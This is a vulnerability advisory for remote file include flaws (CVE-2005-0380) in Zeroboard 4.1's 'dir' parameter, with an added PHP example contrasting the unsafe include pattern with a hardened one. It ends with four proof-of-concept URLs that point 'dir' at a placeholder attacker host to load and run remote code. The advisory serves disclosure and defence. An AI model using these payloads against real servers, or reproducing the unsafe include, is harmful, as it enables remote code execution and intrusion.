Zeroboard DIR Parameter Remote File Include Vulnerabilities
BID: 12206
Info
| Bugtraq ID: | 12206 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0380 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 10 2005 12:00AM |
| Updated: | Jul 12 2009 09:27AM |
| Credit: | Discovery is credited to Optik4Lab. |
| Vulnerable: | Zeroboard 4.1 pl5, 4.1 pl4, 4.1 pl3, 4.1 pl2 |
| Not Vulnerable: | |
Discussion
Multiple remote file include vulnerabilities affect Zeroboard. These issues are due to a failure of the application to properly sanitize user-supplied input through the 'dir' parameter prior to using it in a PHP 'include()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
All versions of Zeroboard are considered vulnerable at the moment.
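As an added illustration, not Zeroboard's own code, the following PHP shows the include pattern the advisory describes beside a hardened form that confines the 'dir' parameter to an existing directory under a fixed base; the `skin/` base, the `_head.php` file name and the function names are assumptions.

```php
<?php
// Added example, not Zeroboard's code. Names of files/functions are assumed.

// Vulnerable pattern: the request parameter flows straight into include(),
// so a URL (where the PHP configuration permits remote includes) or an
// arbitrary local path is loaded and executed as the web server user.
function load_skin_unsafe(): void
{
    $dir = $_GET['dir'] ?? '';
    include $dir . '/_head.php';
}

// Hardened pattern: accept only a plain directory name, resolve it under a
// fixed base with realpath(), and verify the result is still inside the base.
function load_skin_safe(string $requested): void
{
    $base = realpath(__DIR__ . '/skin');
    if ($base === false) {
        throw new RuntimeException('skin base directory missing');
    }

    // No scheme, no path separators, no parent references: reject anything
    // that is not a short alphanumeric name before touching the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        throw new InvalidArgumentException('invalid skin name');
    }

    $target = realpath($base . '/' . $requested);
    // realpath() is false for missing paths; the prefix check also blocks a
    // symlink inside the base that resolves to a directory outside it.
    if ($target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('skin directory not permitted');
    }

    include $target . '/_head.php';
}

// Defence in depth at the server level, independent of the application code:
//   php.ini: allow_url_include = Off   (the default since PHP 5.2)
//            allow_url_fopen   = Off   (when nothing legitimately needs it)

load_skin_safe($_GET['dir'] ?? 'default');
```

Disabling remote includes in php.ini stops the remote variant of this issue, but only the path check in the code stops a local path from being supplied through 'dir'.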
Exploit / POC
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].